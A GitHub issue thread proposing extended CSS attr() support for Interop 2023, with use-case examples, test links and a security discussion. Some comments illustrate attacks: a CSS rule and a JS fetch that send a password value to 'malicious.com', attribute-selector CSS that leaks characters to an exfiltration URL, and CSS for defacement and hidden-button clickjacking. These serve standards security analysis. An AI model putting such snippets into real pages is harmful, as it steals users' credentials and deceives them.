### ISSUE TITLE
`attr()` support extended capabilities

### ISSUE THREAD

**Issue by brandonmcconnell** [web-platform-tests/interop#86]
# Description
The attr() [CSS](https://developer.mozilla.org/en-US/docs/Web/CSS) [function](https://developer.mozilla.org/en-US/docs/Web/CSS/CSS_Functions) is used to retrieve the value of an attribute of the selected element and use it in the stylesheet. It can also be used on [pseudo-elements](https://developer.mozilla.org/en-US/docs/Web/CSS/Pseudo-elements), in which case the value of the attribute on the pseudo-element's originating element is returned. ([MDN](https://developer.mozilla.org/en-US/docs/Web/CSS/attr))

# Specification
<a href="https://w3c.github.io/csswg-drafts/css-values-5/#attr-notation" target="_blank">CSS Values and Units Module Level 5<br /># attr-notation</a>

# Tests
[wpt / css / q: css-values](https://wpt.fyi/results/css/css-values?label=master&label=experimental&aligned&view=subtest&q=attr)

<details><summary>More tests courtesy of @karlcow (from comment below) using…<br /><br /><pre>find css -type f | xargs grep 'attr(' | sort | grep -v 'ref.html' | grep -v '.py' | sed 's,\:.*,,' | sed 's,^,https://wpt.fyi/,' | uniq</pre></summary>

[wpt.fyi/css/css-align/self-alignment/self-align-safe-unsafe-flex-001.html](https://wpt.fyi/css/css-align/self-alignment/self-align-safe-unsafe-flex-001.html)
[wpt.fyi/css/css-align/self-alignment/self-align-safe-unsafe-flex-002.html](https://wpt.fyi/css/css-align/self-alignment/self-align-safe-unsafe-flex-002.html)
[wpt.fyi/css/css-align/self-alignment/self-align-safe-unsafe-flex-003.html](https://wpt.fyi/css/css-align/self-alignment/self-align-safe-unsafe-flex-003.html)
[wpt.fyi/css/css-align/self-alignment/self-align-safe-unsafe-grid-001.html](https://wpt.fyi/css/css-align/self-alignment/self-align-safe-unsafe-grid-001.html)
[wpt.fyi/css/css-align/self-alignment/self-align-safe-unsafe-grid-002.html](https://wpt.fyi/css/css-align/self-alignment/self-align-safe-unsafe-grid-002.html)
[wpt.fyi/css/css-align/self-alignment/self-align-safe-unsafe-grid-003.html](https://wpt.fyi/css/css-align/self-alignment/self-align-safe-unsafe-grid-003.html)
[wpt.fyi/css/css-conditional/at-supports-namespace-001.html](https://wpt.fyi/css/css-conditional/at-supports-namespace-001.html)
[wpt.fyi/css/css-content/attr-case-sensitivity-001.html](https://wpt.fyi/css/css-content/attr-case-sensitivity-001.html)
[wpt.fyi/css/css-content/attr-case-sensitivity-002.html](https://wpt.fyi/css/css-content/attr-case-sensitivity-002.html)
[wpt.fyi/css/css-content/attr-case-sensitivity-003.html](https://wpt.fyi/css/css-content/attr-case-sensitivity-003.html)
[wpt.fyi/css/css-gcpm/string-set-012.html](https://wpt.fyi/css/css-gcpm/string-set-012.html)
[wpt.fyi/css/css-values/attr-color-invalid-cast.html](https://wpt.fyi/css/css-values/attr-color-invalid-cast.html)
[wpt.fyi/css/css-values/attr-color-invalid-fallback.html](https://wpt.fyi/css/css-values/attr-color-invalid-fallback.html)
[wpt.fyi/css/css-values/attr-color-valid.html](https://wpt.fyi/css/css-values/attr-color-valid.html)
[wpt.fyi/css/css-values/attr-in-max.html](https://wpt.fyi/css/css-values/attr-in-max.html)
[wpt.fyi/css/css-values/attr-invalid-type-001.html](https://wpt.fyi/css/css-values/attr-invalid-type-001.html)
[wpt.fyi/css/css-values/attr-invalid-type-002.html](https://wpt.fyi/css/css-values/attr-invalid-type-002.html)
[wpt.fyi/css/css-values/attr-invalid-type-008.html](https://wpt.fyi/css/css-values/attr-invalid-type-008.html)
[wpt.fyi/css/css-values/attr-length-invalid-cast.html](https://wpt.fyi/css/css-values/attr-length-invalid-cast.html)
[wpt.fyi/css/css-values/attr-length-invalid-fallback.html](https://wpt.fyi/css/css-values/attr-length-invalid-fallback.html)
[wpt.fyi/css/css-values/attr-length-valid-zero-nofallback.html](https://wpt.fyi/css/css-values/attr-length-valid-zero-nofallback.html)
[wpt.fyi/css/css-values/attr-length-valid-zero.html](https://wpt.fyi/css/css-values/attr-length-valid-zero.html)
[wpt.fyi/css/css-values/attr-length-valid.html](https://wpt.fyi/css/css-values/attr-length-valid.html)
[wpt.fyi/css/css-values/attr-px-invalid-cast.html](https://wpt.fyi/css/css-values/attr-px-invalid-cast.html)
[wpt.fyi/css/css-values/attr-px-invalid-fallback.html](https://wpt.fyi/css/css-values/attr-px-invalid-fallback.html)
[wpt.fyi/css/css-values/attr-px-valid.html](https://wpt.fyi/css/css-values/attr-px-valid.html)
[wpt.fyi/css/css-values/calc-rgb-percent-001.html](https://wpt.fyi/css/css-values/calc-rgb-percent-001.html)
[wpt.fyi/css/css-variables/variable-generated-content-dynamic-001.html](https://wpt.fyi/css/css-variables/variable-generated-content-dynamic-001.html)
[wpt.fyi/css/cssom/css-style-attr-decl-block.html](https://wpt.fyi/css/cssom/css-style-attr-decl-block.html)
[wpt.fyi/css/cssom/serialize-values.html](https://wpt.fyi/css/cssom/serialize-values.html)

</details>

# Rationale
This has been a highly anticipated feature for several years and would do a great deal to equip developers to utilize values defined in markup within their styles. The workaround thus far has been to exclude these values within CSS custom properties (variables), but that often requires having values in two places— (1) an attribute for proper syntax for a given element and (2) a CSS custom property for usage within stylesheets. but for many, especially non-devs who simply work with HTML, this 

## Supporting rationale
* Many great arguments voiced in this Chromium Dev thread ([246571](https://bugs.chromium.org/p/chromium/issues/detail?id=246571))
* `attr()` is more semantic — avoiding forcing styles into the markup using CSS custom properties as a workaround
* avoiding redundancy — using CSS custom properties instead of being able to use `attr()` properly often requires addtl setup within markup simply to allow value exposure to CSS
* would make data management more achievable in copywriting stage where editors work more predominantly with markup than they do inline styling

## Supporting examples

<details>
<summary>Click to expand relevant example</summary>

### A11Y labels (tooltip example)

    ❌ w/o extended `attr()` features — using `data-` attr workaround
    ```html
    <button
    aria-label="Some label here"
    data-label="Some label here"
    >
    Button
    </button>

    <style>
    button:hover::after,
    button:focus::after {
        /* FALLBACK VALUE NOT SUPPORTED */
        content: attr(data-label);
    }
    </style>
    ```

    ❌ w/o extended `attr()` features — using CSS custom properties workaround
    ```html
    <button
    aria-label="Some label here"
    style="--label: 'Some label here'"
    >
    Button
    </button>

    <style>
    button:hover::after,
    button:focus::after {
        content: var(--label, "default label");
    }
    </style>
    ```

    ✅ w/ extended `attr()` features

    ```html
    <button aria-label="Some label here">Button</button>

    <style>
    button:hover::after,
    button:focus::after {
        content: attr(aria-label, "default label");
    }
    </style>
    ```

### `<type-or-unit>` (units example)

    ❌ w/o extended `attr()` features — using `data-` attr workaround
    ```html
    <div data-size="100" style="width: 100px; height: 100px;"></div>

    <style>
    div {
        background-color: cyan;
        /* VALUE TYPE-CASTING NOT SUPPORTED */
    }
    div::after {
        content: "Size: " attr(data-size);
    }
    </style>
    ```

    ❌ w/o extended `attr()` features — using CSS custom properties workaround
    ```html
    <div style="--size: 100px; --size-label: '100';"></div>

    <style>
    :root {
        /* Coupling variables creates risk of mismatched values */
        --fallback-size: 50px;
        --fallback-size-label: "50";
    }
    div {
        background-color: cyan;
        /* VALUE TYPE-CASTING NOT SUPPORTED */
        width: var(--size, var(--fallback-size));
        height: var(--size, var(--fallback-size));
    }
    div::after {
        content: "Size: " var(--size-label, var(--fallback-size-label));
    }
    </style>
    ```

    ✅ w/ extended `attr()` features

    ```html
    <div data-size="100"></div>

    <style>
    :root {
        --fallback-size: "50";
    }
    div {
        background-color: cyan;
        width: attr(data-size px, var(--fallback-size));
        height: attr(data-size px, var(--fallback-size));
    }
    div::after {
        content: "Size: " attr(data-size, var(--fallback-size));
    }
    </style>
    ```

### background-image (`url` example)

❌ w/o extended `attr()` features — using `data-` attr workaround (not possible without CSS custom properties)
```html
<div
  data-image="/images/background.jpg"
  style="--image: url('/images/background.jpg');"
></div>

<style>
  div {
    background-image: var(--image);
  }
  div::after {
    content: "Image filepath: " attr(data-image);
  }
</style>
```

❌ w/o extended `attr()` features — using CSS custom properties workaround
```html
<div
  style="
    --image-filepath: '/images/background.jpg';
    --image: url('/images/background.jpg');
  "
></div>

<!-- ** important to note here that interpolating the value of `--image-filepath` into `--image` is not yet supported in CSS custom properties, so `--image: url(var(--image-filepath))` would not work -->

<style>
  div {
    background-image: var(--image, none);
  }
  div::after {
    content: "Image filepath: " var(--image-filepath, 'no file present');
  }
</style>
```

✅ w/ extended `attr()` features

```html
<div data-image="/images/background.jpg"></div>

<style>
  div {
    background-image: attr(data-image url, '');
  }
  div::after {
    content: "Image filepath: " attr(data-image, 'no file present');
  }
</style>
```
</details>

## Current Browser Compatibility ([view on MDN](https://developer.mozilla.org/en-US/docs/Web/CSS/attr#browser_compatibility))
<details>
<summary>Expand to see screenshot of CSS <code>attr()</code> browser compatibility chart (<a href="https://developer.mozilla.org/en-US/docs/Web/CSS/attr#browser_compatibility" target="_blank">from MDN</a>)</summary>

![CSS attr() function Current Browser Compatibility](https://user-images.githubusercontent.com/5913254/170577770-166173b8-0775-4712-a458-ff551a1c8d2c.jpg)</details>

**Comment by foolip** [comment]
Hi @brandonmcconnell! We haven't started planning for Interop 2023 yet, but I've created https://github.com/web-platform-tests/interop-2022/issues/78 which you can watch to see when things start happening. At some point there will be a public proposal process, and I'd suggest raising this then.

Interpreting the compat tables is a bit tricky since it's just a lot of red, can you give a few code examples of things that already work in browsers and what things do not?

**Comment by brandonmcconnell** [comment]
Sure, I'll post a few examples later today/tomorrow. Thanks!

**Comment by foolip** [comment]
@brandonmcconnell We just opened up for Interop 2023 proposals yesterday, see https://github.com/web-platform-tests/interop/blob/main/2023/README.md for the process and what to expect.

You have used the same sections as our Focus Area proposal template, so if you like I can change the label to make it such a proposal. Alternatively you could recreate it using https://github.com/web-platform-tests/interop/issues/new?assignees=&labels=focus-area-proposal&template=focus-area-proposal.yml. Which would you prefer?

**Comment by brandonmcconnell** [comment]
@foolip If you wouldn't mind just re-labeling it—if that would suffice—that works for me. Thanks!

**Comment by foolip** [comment]
@brandonmcconnell for the tests you linked to this wpt.fyi query:
https://wpt.fyi/results/css?label=master&label=experimental&aligned&q=attr&view=subtest

That includes a lot of tests that aren't about `attr()`, but this subset is probably mostly about `attr()`:
https://wpt.fyi/results/css/css-values?label=master&label=experimental&aligned&view=subtest&q=attr

At a glance I think some tests are missing, like for percentages and URLs.

If anyone who knows this feature well could take a look, that'd be very helpful!

**Comment by gsnedders** [comment]
> At a glance I think some tests are missing, like for percentages and URLs.

It's somewhat unsurprising that we have few tests given lack of implementations; certainly there could be a vastly larger test suite for this.

**Comment by brandonmcconnell** [comment]
> @brandonmcconnell for the tests you linked to this wpt.fyi query: https://wpt.fyi/results/css?label=master&label=experimental&aligned&q=attr&view=subtest
> 
> That includes a lot of tests that aren't about `attr()`, but this subset is probably mostly about `attr()`: https://wpt.fyi/results/css/css-values?label=master&label=experimental&aligned&view=subtest&q=attr

You're absolutely right. Not sure how that happened, but I've replaced it above now. Thanks!

**Comment by karlcow** [comment]
Maybe
`find css -type f | xargs grep 'attr(' | sort | grep -v 'ref.html' | grep -v '.py' | sed 's,\:.*,,' | sed 's,^,https://wpt.fyi/,' | uniq`

https://wpt.fyi/css/css-align/self-alignment/self-align-safe-unsafe-flex-001.html
https://wpt.fyi/css/css-align/self-alignment/self-align-safe-unsafe-flex-002.html
https://wpt.fyi/css/css-align/self-alignment/self-align-safe-unsafe-flex-003.html
https://wpt.fyi/css/css-align/self-alignment/self-align-safe-unsafe-grid-001.html
https://wpt.fyi/css/css-align/self-alignment/self-align-safe-unsafe-grid-002.html
https://wpt.fyi/css/css-align/self-alignment/self-align-safe-unsafe-grid-003.html
https://wpt.fyi/css/css-conditional/at-supports-namespace-001.html
https://wpt.fyi/css/css-content/attr-case-sensitivity-001.html
https://wpt.fyi/css/css-content/attr-case-sensitivity-002.html
https://wpt.fyi/css/css-content/attr-case-sensitivity-003.html
https://wpt.fyi/css/css-gcpm/string-set-012.html
https://wpt.fyi/css/css-values/attr-color-invalid-cast.html
https://wpt.fyi/css/css-values/attr-color-invalid-fallback.html
https://wpt.fyi/css/css-values/attr-color-valid.html
https://wpt.fyi/css/css-values/attr-in-max.html
https://wpt.fyi/css/css-values/attr-invalid-type-001.html
https://wpt.fyi/css/css-values/attr-invalid-type-002.html
https://wpt.fyi/css/css-values/attr-invalid-type-008.html
https://wpt.fyi/css/css-values/attr-length-invalid-cast.html
https://wpt.fyi/css/css-values/attr-length-invalid-fallback.html
https://wpt.fyi/css/css-values/attr-length-valid-zero-nofallback.html
https://wpt.fyi/css/css-values/attr-length-valid-zero.html
https://wpt.fyi/css/css-values/attr-length-valid.html
https://wpt.fyi/css/css-values/attr-px-invalid-cast.html
https://wpt.fyi/css/css-values/attr-px-invalid-fallback.html
https://wpt.fyi/css/css-values/attr-px-valid.html
https://wpt.fyi/css/css-values/calc-rgb-percent-001.html
https://wpt.fyi/css/css-variables/variable-generated-content-dynamic-001.html
https://wpt.fyi/css/cssom/css-style-attr-decl-block.html
https://wpt.fyi/css/cssom/serialize-values.html

**Comment by gsnedders** [comment]
https://github.com/w3c/csswg-drafts/issues/5092 I think might be the most significant open issue on the spec here.

**Comment by una** [comment]
My understanding is there are security issues for the `url()` syntax of `attr()` but i'm curious if we can scope this down to specific values (i.e. `color`, `number`, `percentage`, etc)

**Comment by brandonmcconnell** [comment]
@gsnedders @una Thanks, it looks like that's a good place to start in terms of security for this. Would it be better to continue the security discussion in that other issue or continue it here in the interop-specific issue?

Nowadays, it's easier than ever—using puppeteer-like tools—to efficiently run web scraping and XSS workarounds.

I wonder if there's a better way to implement security measures for CSS to prevent violations like that. Security is crucial to any language where user data can be exposed, however, when it's so easy to work around such limitations in JS, adding tight limitations around CSS like this feels more like a hindrance to the language than a help (imo).

In the thread @gsnedders mentioned, @tabatkins mentioned a user could do something malicious like this:

```css
input[type="password"] {
  background-image: url(concat('https://malicious.com/new?pw=', attr(value string)));
}
```

This won't currently work though it may very soon, with CSS custom functions and Houdini soon to be supported. With JS, AFAICT someone could accomplish the same malicious goal with this simple JS:

```js
const password = document.querySelector('input[type="password"]');
const sendPassword = () => fetch(`https://malicious.com/new?pw=${password.value}`);
sendPassword();
password.addEventListener('change', sendPassword);
```

The JS version here actually takes the live _property_ value, whereas the CSS function only looks at the static _attribute_ value; however, I also have another issue open to expose the live value _property_ to CSS for use as well:
https://github.com/w3c/csswg-drafts/issues/7869

Weighing between the two, a site's JS and CSS both always have full access to that site's code, so JS is just as vulnerable as CSS here, and a developer should be careful when adding either, though granted a developer is more aware of JS risks than any CSS risks, which is valid today. The real risk would appear to be XSS attacks, where JS/browsers already defend against JS XSS attacks, but not so for CSS. I think it would be best in the long run for CSS to have full exposure to site content as JS does without tremendously limiting it, though such a change would require some strong preventative measures as JS already takes. iframes also implement a similar type of security where the iframe itself sets which permissions the iframe has and what it can access.

What if external CSS had this same sort of restriction where developers had to explicitly set which permissions a stylesheet had if it needed to access more vulnerable pieces on a page (e.g. form fields) that would arguably be very beneficial for CSS to be able to access? I do think passwords specifically could/should require their own separate permission if they were ever to be supported.

I'm not sure what such an implementation/API could look like for CSS, maybe something like this:
```html
<link href="./styles" rel="stylesheet" allow="form password localstorage" />
<style allow="form password localstorage"></style>
```

**TL;DR:** Security is crucial, and I think adding a feature like this prompts a deeper dive into how security is handled in CSS. I think native, same-origin JS and CSS should share the same visibility/exposure for most data, and 3rd-party JS and CSS should have to jump through the same or similar hoops to access local data (XSS), whether it be a special attribute like the `allow` example I used above or something else entirely.

These are just my initial thoughts as I sit here in an overcrowded coffee shop, but I'd love to keep this dialogue going and explore what that could look like.

Thanks, all!

**Comment by ExtAnimal** [comment]
When will this become a standard?

It will be some amazingly useful, but I suspect I will be retired before I get to use it.

Pulling data in from `data-xxx` attributes and using them in combination with CSS properties can enable simplification of  lot of code

**Comment by una** [comment]
@brandonmcconnell I agree that allowing arbitrary URLs could be dangerous. Could we could go the `:visited` route with this and potentially limit the syntax capabilities to specific syntax values like `color` and `percentage`? Do you forsee a security risk there?

**Comment by JoshuaLindquist** [comment]
A comment in the CSSWG security issue describes how `attr()` can be abused without `url` access. 
[https://github.com/w3c/csswg-drafts/issues/5092#issuecomment-636452209](https://github.com/w3c/csswg-drafts/issues/5092#issuecomment-636452209)

That doesn't necessarily rule out _all_ of the features, but if `data-` attributes and `url` are both a concern, then a lot of the common use cases are off the table until this is resolved.

I would love to see this as part of Interop 2023 - The [CSS Shapes spec](https://drafts.csswg.org/css-shapes-1/#shapes-from-image) shows a useful example using `shape-outside: attr(src url);` that does not work anywhere and has been taunting me for years. Unfortunately, it really seems like this is something that needs more time in the Working Group.

**Comment by jakearchibald** [comment]
Security is essential, but we shouldn't pretend that third-party CSS is in any way safe. If you include other-site CSS on your site, they own your site now.

```css
body {
  display: none;
}

html::after {
  content: 'HTTP 500 Server Error';
}
```

Imagine if the third party was doing that for some small percent of users. It'd be difficult to debug, and erode user trust.

More subtle hacks could just remove the 'buy' button occasionally, or rearrange the paragraphs in content.

```css
.price-value::before {
  content: '1';
}
```

Oh shit prices just went up.

```css
.delete-everything-button {
  opacity: 0;
  position: absolute;
  top: 500px;
  left: 300px;
  z-index: 10000;
}
```

Now a dangerous button can be accidentally clicked.

Etc etc. Third party CSS is not safe.

**Comment by brandonmcconnell** [comment]
@jakearchibald That's kinda my point exactly too. Third-party scripts and styles are both already unsafe.

I don't think we open the door all that much more by allowing wider access to `attr()`, and if it is deemed as such, then I feel a better approach might be to expose some way of whitelisting/blacklisting capabilities (e.g. properties, functions, etc.) deemed vulnerable for 3rd-party styles.

Integrating with third-party sources always poses a risk and requires a level of trust with that source. Exposing whitelist/blacklist options may help to mitigate that risk, but I don't think avoiding it altogether is a good long-term solution. That's my hot take 🤷🏻‍♂️

**Comment by jakearchibald** [comment]
I think allow/blocklist solutions creates a false sense of security. Attributes are already exposed to CSS. Yes, `attr()` allows you to do more with them, but they're already visible to CSS.

**Comment by brandonmcconnell** [comment]
@jakearchibald I'm aware that some attributes are already exposed, but how would someone currently—using CSS—access the value of a field's "value" attribute?

**Comment by keithamus** [comment]
It's possible to use attribute selectors to ex-filtrate individual characters, or fragments. It would lead to a giant load of CSS but a script could knock up this in a jiffy.
```css
[some-attribute*="a"] { background-image: url(https://my-site.com/exfiltrate?letter=a) }
[some-attribute*="b"] { background-image: url(https://my-site.com/exfiltrate?letter=b) }
[some-attribute*="c"] { background-image: url(https://my-site.com/exfiltrate?letter=c) }
/*...*/
[some-attribute*="a"][some-attribute*="b"][some-attribute*="c"] { background-image: url(https://my-site.com/exfiltrate?letter=a,b,c) }
```

**Comment by foolip** [comment]
In the State of CSS 2022 question about browser incompatibilities, there were some mentions of `attr()`, although not enough to make the top list in https://github.com/web-platform-tests/interop/issues/248. I counted a total of 5 mentions, with one adding a bit of detail:

> Making the attr() function truly useful, as explained on his article.
https://css-tricks.com/css-attr-function-got-nothin-custom-properties/#aa-the-css3-values-spec-in-candidate-recommendation-has-a-way-to-make-attr-useful

**Comment by jakearchibald** [comment]
Is there an example of a CSS sanitizer that:

- Aims to prevent reading attribute values
- Does not strip `attr()`

**Comment by arturjanc** [comment]
> Is there an example of a CSS sanitizer that: 
> * Aims to prevent reading attribute values
> * Does not strip attr()

Sure, take a look at the first two restrictive examples of the use of DOMPurify and the native Sanitizer API from https://github.com/cure53/DOMPurify and https://web.dev/sanitizer/ respectively:

```
>>> DOMPurify.sanitize("<b style='content: attr(foo)'>foo</b><style>foo</style>", {ALLOWED_TAGS: ['b']})
<b style="content: attr(foo)">foo</b>
```

```
>>> document.body.setHTML("<b style='content: attr(foo)'>foo</b><style>foo</style>", { sanitizer: new Sanitizer({allowElements: [ "b" ]}) });
>>> document.body.innerHTML
'<b style="content: attr(foo)">foo</b>foo'
```

**Comment by brandonmcconnell** [comment]
Related to this conversation, from another conversation happening on the [`value()` idea proposal](https://github.com/w3c/csswg-drafts/issues/7869):

@brandonmcconnell:
>Perhaps for this case specifically, what could help here to avoid any additional security vulnerabilities with `value()` would be some secure way for only first-party scripts to whitelist elements that would allow access to them using `value()` in this way, something like a "public" attribute, but more secure than a mere attribute.

@arturjanc:
>Limiting `value()` to data explicitly marked as readable by stylesheets seems like a reasonable possible solution to explore here.

@brandonmcconnell:
>Yeah, I'm all for that!
>
>With that in mind, maybe this could actually work using something as simple as a special HTML attribute that browsers will require elements to have in order to execute either `attr()` or `value()` on them since only first-party scripts would have the ability to add such an attribute post-pageload which are already trusted anyway.
>
>CSS `attr()` and `value()` would then be limited to only those "whitelisted" elements. 👏🏼

**Comment by jakearchibald** [comment]
@arturjanc

> Sure, take a look at the first two restrictive examples of the use of DOMPurify and the native Sanitizer API from https://github.com/cure53/DOMPurify and https://web.dev/sanitizer/ respectively:

Hmm, good example. Could `attr()` restrictions be limited to places that cannot already select based on attribute? So, `attr()` would fail on inline styles, but work in stylesheets?

**Comment by jakearchibald** [comment]
The restrictions in `url()` seem ok, but whatever restrictions are applied, it'd be nice to have a way to opt-out of the restrictions.

**Comment by arturjanc** [comment]
In the model I was thinking of above, opting out of the restrictions would happen per-element; if you have an element on which you want to use `attr()` within a `url()`, you'd add an attribute to expose the value to CSS, e.g.
```
<style>
*[data-animal] {
  background-image: url(concat('https://site.example/generate-animal?animal=', attr(data-animal string)));
}
</style>
```
and
```
<div data-animal="hippopotamus" allow-attribute-access-from-css></div>
```
or
```
<div data-animal="meerkat" allow-attribute-access-from-css="data-animal"></div>
```
(the attribute name is obviously bad, this is just for the sake of discussion)

**Comment by jgraham** [comment]
Just a note: this design discussion should probably happen in either the HTML repo, or the relevant CSS repo; the Interop repo is likely missing many of the people who would like to be involved.

**Comment by ExE-Boss** [comment]
Note that it’s not possible to use any CSS function inside `url(…)` since it’s a legacy thing which always parses its first argument as a raw string: <https://drafts.csswg.org/css-syntax/#consume-a-url-token>

**Comment by brandonmcconnell** [comment]
@ExE-Boss Could `url()` be adjusted to accept any URL token type in CSS? Once CSS functions become available, it will be possible to concatenate and convert string types to URL types AFAIK.

**Comment by nairnandu** [comment]
Thank you for proposing `attr()` for inclusion in Interop 2023.

We wanted to let you know that this proposal was not selected to be part of Interop this year. We had many strong proposals, and could not accept them all. There is a lot of support for `attr()`, but it may need more standards work before it’s ready for adoption. Resubmitting a proposal for this feature in the future would be welcome.

For an overview of our process, see the [proposal selection summary](https://github.com/web-platform-tests/interop/blob/main/2023/proposal-selection.md). Thank you again for contributing to Interop 2023!

_Posted on behalf of the Interop team._

**Comment by brandonmcconnell** [comment]
@foolip Could we look into resurrecting this one for Interop 2024 as well?

**Comment by brandonmcconnell** [comment]
Created a new issue for this in Interop 2024: **https://github.com/web-platform-tests/interop/issues/521**
